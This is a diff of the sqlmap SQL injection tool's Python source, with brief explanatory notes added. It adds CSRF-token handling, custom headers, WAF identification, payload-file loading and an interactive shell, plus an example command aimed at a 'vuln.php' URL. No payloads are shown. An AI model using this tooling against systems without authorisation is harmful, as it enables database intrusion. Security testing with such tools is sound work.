+process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
 pollProcess(process, True)
 stdout, stderr = process.communicate()
 success = not process.returncode
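
The updated command first discards local modifications so a dirty checkout cannot abort the pull. As a standalone sketch of the same subprocess call (repository URL taken from this mirror):

    from subprocess import PIPE, Popen

    process = Popen("git checkout . && git pull https://github.com/sqlmapproject/sqlmap.git HEAD",
                    shell=True, stdout=PIPE, stderr=PIPE)
    stdout, stderr = process.communicate()
    success = process.returncode == 0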

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,6 +9,7 @@ import os
 import zipfile

 from lib.core.exception import SqlmapDataException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.settings import UNICODE_ENCODING

 class Wordlist(object):

@@ -21,6 +22,7 @@ class Wordlist(object):
 self.fp = None
 self.index = 0
 self.counter = -1
+self.current = None
 self.iter = None
 self.custom = custom or []
 self.proc_id = proc_id

@@ -37,15 +39,15 @@ class Wordlist(object):
 elif self.index == len(self.filenames):
 self.iter = iter(self.custom)
 else:
-current = self.filenames[self.index]
+self.current = self.filenames[self.index]
-if os.path.splitext(current)[1].lower() == ".zip":
+if os.path.splitext(self.current)[1].lower() == ".zip":
-_ = zipfile.ZipFile(current, 'r')
+_ = zipfile.ZipFile(self.current, 'r')
 if len(_.namelist()) == 0:
-errMsg = "no file(s) inside '%s'" % current
+errMsg = "no file(s) inside '%s'" % self.current
 raise SqlmapDataException(errMsg)
 self.fp = _.open(_.namelist()[0])
 else:
-self.fp = open(current, 'r')
+self.fp = open(self.current, 'r')
 self.iter = iter(self.fp)

 self.index += 1

@@ -61,6 +63,11 @@ class Wordlist(object):
 self.counter += 1
 try:
 retVal = self.iter.next().rstrip()
+except zipfile.error, ex:
+errMsg = "something seems to be wrong with "
+errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex)
+errMsg += "sure that you haven't made any changes to it"
+raise SqlmapInstallationException, errMsg
 except StopIteration:
 self.adjust()
 retVal = self.iter.next().rstrip()
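
The Wordlist changes above boil down to: remember the current file, read the first member when it is a .zip archive, and turn archive corruption into a dedicated error. A compact sketch of that behaviour (a standalone helper, not sqlmap's class):

    import os
    import zipfile

    def open_wordlist(path):
        # .zip wordlists are read via their first archived member.
        if os.path.splitext(path)[1].lower() == ".zip":
            archive = zipfile.ZipFile(path, 'r')
            if not archive.namelist():
                raise ValueError("no file(s) inside '%s'" % path)
            return archive.open(archive.namelist()[0])
        return open(path, 'r')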

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,7 +9,6 @@ import re

 from xml.sax.handler import ContentHandler

-from lib.core.common import checkFile
 from lib.core.common import Backend
 from lib.core.common import parseXmlFile
 from lib.core.common import sanitizeStr

@@ -63,7 +62,7 @@ class MSSQLBannerHandler(ContentHandler):
 def endElement(self, name):
 if name == "signature":
 for version in (self._version, self._versionAlt):
-if version and re.search(r" %s[\.\ ]+" % version, self._banner):
+if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
 self._feedInfo("dbmsRelease", self._release)
 self._feedInfo("dbmsVersion", self._version)
 self._feedInfo("dbmsServicePack", self._servicePack)
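
The re.escape() change above matters because version strings contain dots, and an unescaped dot matches any character. A quick illustration of the false positive it prevents (banner text is made up):

    import re

    banner = "Microsoft SQL Server  910 "
    version = "9.0"
    print(bool(re.search(r" %s[\.\ ]+" % version, banner)))             # True  (dot matches '1')
    print(bool(re.search(r" %s[\.\ ]+" % re.escape(version), banner)))  # False (literal "9.0" required)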

@@ -104,8 +103,6 @@ def bannerParser(banner):
 if not xmlfile:
 return

-checkFile(xmlfile)

 if Backend.isDbms(DBMS.MSSQL):
 handler = MSSQLBannerHandler(banner, kb.bannerFp)
 parseXmlFile(xmlfile, handler)

@@ -1,11 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 import os
+import re
+import shlex
 import sys

 from optparse import OptionError

@@ -17,13 +19,22 @@ from lib.core.common import checkDeprecatedOptions
 from lib.core.common import checkSystemEncoding
 from lib.core.common import expandMnemonics
 from lib.core.common import getUnicode
+from lib.core.data import cmdLineOptions
+from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.defaults import defaults
+from lib.core.enums import AUTOCOMPLETE_TYPE
+from lib.core.exception import SqlmapShellQuitException
+from lib.core.exception import SqlmapSyntaxException
 from lib.core.settings import BASIC_HELP_ITEMS
 from lib.core.settings import DUMMY_URL
 from lib.core.settings import IS_WIN
 from lib.core.settings import MAX_HELP_OPTION_LENGTH
 from lib.core.settings import VERSION_STRING
+from lib.core.shell import autoCompletion
+from lib.core.shell import clearHistory
+from lib.core.shell import loadHistory
+from lib.core.shell import saveHistory

 def cmdLineParser():
 """

@@ -32,7 +43,7 @@ def cmdLineParser():

 checkSystemEncoding()

-_ = os.path.normpath(sys.argv[0])
+_ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())

 usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
 "\"%s\"" % _ if " " in _ else _)

@@ -81,6 +92,9 @@ def cmdLineParser():
 request = OptionGroup(parser, "Request", "These options can be used "
 "to specify how to connect to the target URL")

+request.add_option("--method", dest="method",
+help="Force usage of given HTTP method (e.g. PUT)")

 request.add_option("--data", dest="data",
 help="Data string to be sent through POST")

@@ -113,6 +127,9 @@ def cmdLineParser():
 request.add_option("--referer", dest="referer",
 help="HTTP Referer header value")

+request.add_option("-H", "--header", dest="header",
+help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")")

 request.add_option("--headers", dest="headers",
 help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")

@@ -127,6 +144,9 @@ def cmdLineParser():
 request.add_option("--auth-private", dest="authPrivate",
 help="HTTP authentication PEM private key file")

+request.add_option("--ignore-401", dest="ignore401", action="store_true",
+help="Ignore HTTP Error 401 (Unauthorized)")

 request.add_option("--proxy", dest="proxy",
 help="Use a proxy to connect to the target URL")

@@ -168,16 +188,28 @@ def cmdLineParser():
 request.add_option("--randomize", dest="rParam",
 help="Randomly change value for given parameter(s)")

-request.add_option("--safe-url", dest="safUrl",
+request.add_option("--safe-url", dest="safeUrl",
 help="URL address to visit frequently during testing")

-request.add_option("--safe-freq", dest="saFreq", type="int",
+request.add_option("--safe-post", dest="safePost",
+help="POST data to send to a safe URL")

+request.add_option("--safe-req", dest="safeReqFile",
+help="Load safe HTTP request from a file")

+request.add_option("--safe-freq", dest="safeFreq", type="int",
 help="Test requests between two visits to a given safe URL")

 request.add_option("--skip-urlencode", dest="skipUrlEncode",
 action="store_true",
 help="Skip URL encoding of payload data")

+request.add_option("--csrf-token", dest="csrfToken",
+help="Parameter used to hold anti-CSRF token")

+request.add_option("--csrf-url", dest="csrfUrl",
+help="URL address to visit to extract anti-CSRF token")

 request.add_option("--force-ssl", dest="forceSSL",
 action="store_true",
 help="Force usage of SSL/HTTPS")

@@ -223,6 +255,9 @@ def cmdLineParser():
 injection.add_option("--skip", dest="skip",
 help="Skip testing for given parameter(s)")

+injection.add_option("--skip-static", dest="skipStatic", action="store_true",
+help="Skip testing parameters that not appear dynamic")

 injection.add_option("--dbms", dest="dbms",
 help="Force back-end DBMS to this value")

@@ -271,7 +306,7 @@ def cmdLineParser():
 "default %d)" % defaults.level)

 detection.add_option("--risk", dest="risk", type="int",
-help="Risk of tests to perform (0-3, "
+help="Risk of tests to perform (1-3, "
 "default %d)" % defaults.level)

 detection.add_option("--string", dest="string",

@@ -451,7 +486,7 @@ def cmdLineParser():
 enumeration.add_option("--sql-file", dest="sqlFile",
 help="Execute SQL statements from given file(s)")

-# User-defined function options
+# Brute force options
 brute = OptionGroup(parser, "Brute force", "These "
 "options can be used to run brute force "
 "checks")

@@ -585,6 +620,9 @@ def cmdLineParser():
 general.add_option("--crawl", dest="crawlDepth", type="int",
 help="Crawl the website starting from the target URL")

+general.add_option("--crawl-exclude", dest="crawlExclude",
+help="Regexp to exclude pages from crawling (e.g. \"logout\")")

 general.add_option("--csv-del", dest="csvDel",
 help="Delimiting character used in CSV output "
 "(default \"%s\")" % defaults.csvDel)

@@ -651,11 +689,7 @@ def cmdLineParser():
 help="Set question answers (e.g. \"quit=N,follow=N\")")

 miscellaneous.add_option("--beep", dest="beep", action="store_true",
-help="Make a beep sound when SQL injection is found")
+help="Beep on question and/or when SQL injection is found")

-miscellaneous.add_option("--check-waf", dest="checkWaf",
-action="store_true",
-help="Heuristically check for WAF/IPS/IDS protection")

 miscellaneous.add_option("--cleanup", dest="cleanup",
 action="store_true",

@@ -675,12 +709,16 @@ def cmdLineParser():

 miscellaneous.add_option("--identify-waf", dest="identifyWaf",
 action="store_true",
-help="Make a through testing for a WAF/IPS/IDS protection")
+help="Make a thorough testing for a WAF/IPS/IDS protection")

 miscellaneous.add_option("--mobile", dest="mobile",
 action="store_true",
 help="Imitate smartphone through HTTP User-Agent header")

+miscellaneous.add_option("--offline", dest="offline",
+action="store_true",
+help="Work in offline mode (only use session data)")

 miscellaneous.add_option("--page-rank", dest="pageRank",
 action="store_true",
 help="Display page rank (PR) for Google dork results")

@@ -691,7 +729,10 @@ def cmdLineParser():

 miscellaneous.add_option("--smart", dest="smart",
 action="store_true",
-help="Conduct through tests only if positive heuristic(s)")
+help="Conduct thorough tests only if positive heuristic(s)")

+miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
+help="Prompt for an interactive sqlmap shell")

 miscellaneous.add_option("--wizard", dest="wizard",
 action="store_true",

@@ -716,9 +757,6 @@ def cmdLineParser():
 parser.add_option("--force-dns", dest="forceDns", action="store_true",
 help=SUPPRESS_HELP)

-parser.add_option("--ignore-401", dest="ignore401", action="store_true",
-help=SUPPRESS_HELP)

 parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
 help=SUPPRESS_HELP)

@@ -765,22 +803,81 @@ def cmdLineParser():
 option = parser.get_option("-h")
 option.help = option.help.capitalize().replace("this help", "basic help")

-args = []
+argv = []
+prompt = False
 advancedHelp = True
+extraHeaders = []

 for arg in sys.argv:
-args.append(getUnicode(arg, system=True))
+argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))

-checkDeprecatedOptions(args)
+checkDeprecatedOptions(argv)

+prompt = "--sqlmap-shell" in argv

+if prompt:
+parser.usage = ""
+cmdLineOptions.sqlmapShell = True

+_ = ["x", "q", "exit", "quit", "clear"]

+for option in parser.option_list:
+_.extend(option._long_opts)
+_.extend(option._short_opts)

+for group in parser.option_groups:
+for option in group.option_list:
+_.extend(option._long_opts)
+_.extend(option._short_opts)

+autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)

+while True:
+command = None

+try:
+command = raw_input("sqlmap-shell> ").strip()
+command = getUnicode(command, encoding=sys.stdin.encoding)
+except (KeyboardInterrupt, EOFError):
+print
+raise SqlmapShellQuitException

+if not command:
+continue
+elif command.lower() == "clear":
+clearHistory()
+print "[i] history cleared"
+saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+elif command.lower() in ("x", "q", "exit", "quit"):
+raise SqlmapShellQuitException
+elif command[0] != '-':
+print "[!] invalid option(s) provided"
+print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
+else:
+saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+break

+try:
+for arg in shlex.split(command):
+argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
+except ValueError, ex:
+raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message

 # Hide non-basic options in basic help case
-for i in xrange(len(sys.argv)):
+for i in xrange(len(argv)):
-if sys.argv[i] == '-hh':
+if argv[i] == "-hh":
-sys.argv[i] = '-h'
+argv[i] = "-h"
-elif sys.argv[i] == '--version':
+elif argv[i] == "-H":
-print VERSION_STRING
+if i + 1 < len(argv):
+extraHeaders.append(argv[i + 1])
+elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
+argv[i] = argv[i][:-1]
+conf.skipThreadCheck = True
+elif argv[i] == "--version":
+print VERSION_STRING.split('/')[-1]
 raise SystemExit
-elif sys.argv[i] == '-h':
+elif argv[i] == "-h":
 advancedHelp = False
 for group in parser.option_groups[:]:
 found = False

@@ -793,16 +890,25 @@ def cmdLineParser():
 parser.option_groups.remove(group)

 try:
-(args, _) = parser.parse_args(args)
+(args, _) = parser.parse_args(argv)
+except UnicodeEncodeError, ex:
+print "\n[!] %s" % ex.object.encode("unicode-escape")
+raise SystemExit
 except SystemExit:
-if '-h' in sys.argv and not advancedHelp:
+if "-h" in argv and not advancedHelp:
 print "\n[!] to see full list of options run with '-hh'"
 raise

+if extraHeaders:
+if not args.headers:
+args.headers = ""
+delimiter = "\\n" if "\\n" in args.headers else "\n"
+args.headers += delimiter + delimiter.join(extraHeaders)

 # Expand given mnemonic options (e.g. -z "ign,flu,bat")
-for i in xrange(len(sys.argv) - 1):
+for i in xrange(len(argv) - 1):
-if sys.argv[i] == '-z':
+if argv[i] == "-z":
-expandMnemonics(sys.argv[i + 1], parser, args)
+expandMnemonics(argv[i + 1], parser, args)

 if args.dummy:
 args.url = args.url or DUMMY_URL
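
The --sqlmap-shell loop added above follows a common pattern: read a line, shlex-split it into argv-style tokens, and hand those back to the option parser. A stripped-down sketch (the parser setup here is illustrative, not sqlmap's full option set):

    import shlex
    from optparse import OptionParser

    parser = OptionParser()
    parser.add_option("-u", "--url", dest="url")
    parser.add_option("--banner", dest="banner", action="store_true")

    while True:
        command = raw_input("sqlmap-shell> ").strip()
        if command.lower() in ("x", "q", "exit", "quit"):
            break
        if not command.startswith("-"):
            print("[!] invalid option(s) provided")
            continue
        # Split like a shell would, so quoted values survive intact.
        options, _ = parser.parse_args(shlex.split(command))
        print(options)
        break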

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -11,6 +11,8 @@ from ConfigParser import MissingSectionHeaderError
 from ConfigParser import ParsingError

 from lib.core.common import checkFile
+from lib.core.common import getUnicode
+from lib.core.common import openFile
 from lib.core.common import unArrayizeValue
 from lib.core.common import UnicodeRawConfigParser
 from lib.core.data import conf

@@ -40,7 +42,7 @@ def configFileProxy(section, option, boolean=False, integer=False):
 value = config.get(section, option)
 except ValueError, ex:
 errMsg = "error occurred while processing the option "
-errMsg += "'%s' in provided configuration file ('%s')" % (option, str(ex))
+errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
 raise SqlmapSyntaxException(errMsg)

 if value:

@@ -65,13 +67,13 @@ def configFileParser(configFile):
 logger.debug(debugMsg)

 checkFile(configFile)
-configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)
+configFP = openFile(configFile, "rb")

 try:
 config = UnicodeRawConfigParser()
 config.readfp(configFP)
-except (MissingSectionHeaderError, ParsingError), ex:
+except Exception, ex:
-errMsg = "you have provided an invalid configuration file ('%s')" % str(ex)
+errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message
 raise SqlmapSyntaxException(errMsg)

 if not config.has_section("Target"):

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,14 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 import itertools
 import os

-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths

@@ -36,7 +35,6 @@ def headersParser(headers):
 for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
 value = headers[header]
 xmlfile = kb.headerPaths[header]
-checkFile(xmlfile)

 handler = FingerprintHandler(value, kb.headersFp)

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,7 +9,6 @@ import re

 from xml.sax.handler import ContentHandler

-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths

@@ -49,7 +48,6 @@ def htmlParser(page):
 """

 xmlfile = paths.ERRORS_XML
-checkFile(xmlfile)
 handler = HTMLHandler(page)

 parseXmlFile(xmlfile, handler)

@@ -1,15 +1,18 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import os

 from xml.etree import ElementTree as et

 from lib.core.data import conf
 from lib.core.data import paths
 from lib.core.datatype import AttribDict
+from lib.core.exception import SqlmapInstallationException

 def cleanupVals(text, tag):
 if tag in ("clause", "where"):

@@ -66,7 +69,32 @@ def parseXmlNode(node):

 conf.tests.append(test)

-def loadPayloads():
+def loadBoundaries():
-doc = et.parse(paths.PAYLOADS_XML)
+try:
+doc = et.parse(paths.BOUNDARIES_XML)
+except Exception, ex:
+errMsg = "something seems to be wrong with "
+errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
+errMsg += "sure that you haven't made any changes to it"
+raise SqlmapInstallationException, errMsg

+root = doc.getroot()
+parseXmlNode(root)

+def loadPayloads():
+payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
+payloadFiles.sort()

+for payloadFile in payloadFiles:
+payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)

+try:
+doc = et.parse(payloadFilePath)
+except Exception, ex:
+errMsg = "something seems to be wrong with "
+errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
+errMsg += "sure that you haven't made any changes to it"
+raise SqlmapInstallationException, errMsg

 root = doc.getroot()
 parseXmlNode(root)
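
The new loader above walks a directory of XML payload files instead of a single file, and reports parse failures as installation problems. A sketch of the same pattern in isolation (directory path and error type are illustrative):

    import os
    from xml.etree import ElementTree as et

    def load_xml_dir(directory):
        roots = []
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            try:
                roots.append(et.parse(path).getroot())
            except Exception as ex:
                # A broken XML file usually means a damaged installation.
                raise RuntimeError("something seems to be wrong with '%s' ('%s')" % (path, ex))
        return roots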

@@ -1,15 +1,17 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import httplib
 import re

 from lib.core.common import readInput
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.exception import SqlmapSyntaxException
 from lib.request.connect import Connect as Request
 from thirdparty.oset.pyoset import oset

@@ -26,8 +28,13 @@ def parseSitemap(url, retVal=None):
 abortedFlag = False
 retVal = oset()

+try:
 content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
-for match in re.finditer(r"<loc>\s*([^<]+)", content):
+except httplib.InvalidURL:
+errMsg = "invalid URL given for sitemap ('%s')" % url
+raise SqlmapSyntaxException, errMsg

+for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
 if abortedFlag:
 break
 url = match.group(1).strip()
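
The sitemap parsing above is regex-driven, and falling back to an empty string keeps the loop from failing when the page could not be fetched. The extraction step in isolation:

    import re

    def extract_locations(content):
        # <loc> entries may be preceded by whitespace; anything up to the next '<' is the URL.
        return [match.group(1).strip() for match in re.finditer(r"<loc>\s*([^<]+)", content or "")]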

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -27,10 +27,10 @@ from lib.core.data import logger
 from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PLACE
 from lib.core.exception import SqlmapCompressionException
+from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
-from lib.core.settings import ML
 from lib.core.settings import META_CHARSET_REGEX
 from lib.core.settings import PARSE_HEADERS_LIMIT
 from lib.core.settings import VIEWSTATE_REGEX

@@ -38,6 +38,7 @@ from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser
 from lib.utils.htmlentities import htmlEntities
 from thirdparty.chardet import detect
+from thirdparty.odict.odict import OrderedDict

 def forgeHeaders(items=None):
 """

@@ -51,8 +52,8 @@ def forgeHeaders(items=None):
 if items[_] is None:
 del items[_]

-headers = dict(conf.httpHeaders)
+headers = OrderedDict(conf.httpHeaders)
-headers.update(items or {})
+headers.update(items.items())

 class _str(str):
 def capitalize(self):

@@ -62,9 +63,15 @@ def forgeHeaders(items=None):
 return _str(self)

 _ = headers
-headers = {}
+headers = OrderedDict()
 for key, value in _.items():
 success = False

+for _ in headers:
+if _.upper() == key.upper():
+del headers[_]
+break

 if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
 try:
 headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455
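
Switching to an ordered mapping plus the case-insensitive lookup above prevents duplicate headers such as "host" and "Host" from coexisting while preserving insertion order. The same idea with the standard library (sqlmap itself uses its bundled odict):

    from collections import OrderedDict

    def set_header(headers, name, value):
        # Header names are case-insensitive, so drop any existing variant first.
        for existing in list(headers):
            if existing.upper() == name.upper():
                del headers[existing]
                break
        headers[name] = value

    headers = OrderedDict([("host", "example.com")])
    set_header(headers, "Host", "target.example")
    # -> OrderedDict([('Host', 'target.example')])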

@@ -93,8 +100,8 @@ def forgeHeaders(items=None):
 _ = readInput(message, default="Y")
 kb.mergeCookies = not _ or _[0] in ("y", "Y")

-if kb.mergeCookies:
+if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
-_ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
+_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
 headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])

 if PLACE.COOKIE in conf.parameters:

@@ -105,7 +112,7 @@ def forgeHeaders(items=None):
 elif not kb.testMode:
 headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))

-if kb.testMode:
+if kb.testMode and not conf.csrfToken:
 resetCookieJar(conf.cj)

 return headers

@@ -141,7 +148,7 @@ def checkCharEncoding(encoding, warn=True):
 return encoding

 # Reference: http://www.destructor.de/charsets/index.htm
-translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk"}
+translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}

 for delimiter in (';', ',', '('):
 if delimiter in encoding:

@@ -194,7 +201,7 @@ def checkCharEncoding(encoding, warn=True):
 except LookupError:
 if warn:
 warnMsg = "unknown web page charset '%s'. " % encoding
-warnMsg += "Please report by e-mail to %s." % ML
+warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
 singleTimeLogMessage(warnMsg, logging.WARN, encoding)
 encoding = None

@@ -257,7 +264,7 @@ def decodePage(page, contentEncoding, contentType):

 if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
 or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
-kb.pageEncoding = httpCharset or metaCharset
+kb.pageEncoding = httpCharset or metaCharset  # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
 debugMsg = "declared web page charset '%s'" % kb.pageEncoding
 singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
 else:

@@ -267,6 +274,10 @@ def decodePage(page, contentEncoding, contentType):

 # can't do for all responses because we need to support binary files too
 if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
+if kb.heuristicMode:
+kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
+page = getUnicode(page, kb.pageEncoding)
+else:
 # e.g. Ãëàâà
 if "&#" in page:
 page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)

@@ -300,6 +311,8 @@ def decodePage(page, contentEncoding, contentType):
 def processResponse(page, responseHeaders):
 kb.processResponseCounter += 1

+page = page or ""

 parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)

 if conf.parseErrors:

@@ -318,3 +331,7 @@ def processResponse(page, responseHeaders):
 continue
 conf.paramDict[PLACE.POST][name] = value
 conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])

+if re.search(BLOCKED_IP_REGEX, page):
+errMsg = "it appears that you have been blocked by the target server"
+singleTimeLogMessage(errMsg, logging.ERROR)

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -132,8 +132,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
 seq1 = seq1[count:]
 seq2 = seq2[count:]

+while True:
+try:
 seqMatcher.set_seq1(seq1)
+except MemoryError:
+seq1 = seq1[:len(seq1) / 1024]
+else:
+break

+while True:
+try:
 seqMatcher.set_seq2(seq2)
+except MemoryError:
+seq2 = seq2[:len(seq2) / 1024]
+else:
+break

 ratio = round(seqMatcher.quick_ratio(), 3)
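
The retry loops added above trade accuracy for robustness: when difflib cannot hold a sequence in memory, the sequence is shrunk and the call retried instead of aborting the comparison. The same mechanism in isolation:

    import difflib

    def set_seq1_safely(matcher, seq):
        while True:
            try:
                matcher.set_seq1(seq)
            except MemoryError:
                seq = seq[:len(seq) // 1024]  # keep a small prefix and retry
            else:
                break
        return seq

    matcher = difflib.SequenceMatcher(None)
    set_seq1_safely(matcher, "some very long response body")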
|
|
||||||
|
|
|
@ -1,21 +1,31 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import compiler
|
||||||
import httplib
|
import httplib
|
||||||
import json
|
import json
|
||||||
|
import keyword
|
||||||
import logging
|
import logging
|
||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
import string
|
import string
|
||||||
|
import struct
|
||||||
import time
|
import time
|
||||||
import traceback
|
import traceback
|
||||||
import urllib2
|
import urllib2
|
||||||
import urlparse
|
import urlparse
|
||||||
|
|
||||||
|
try:
|
||||||
|
import websocket
|
||||||
|
from websocket import WebSocketException
|
||||||
|
except ImportError:
|
||||||
|
class WebSocketException(Exception):
|
||||||
|
pass
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safecharencode
|
from extra.safe2bin.safe2bin import safecharencode
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
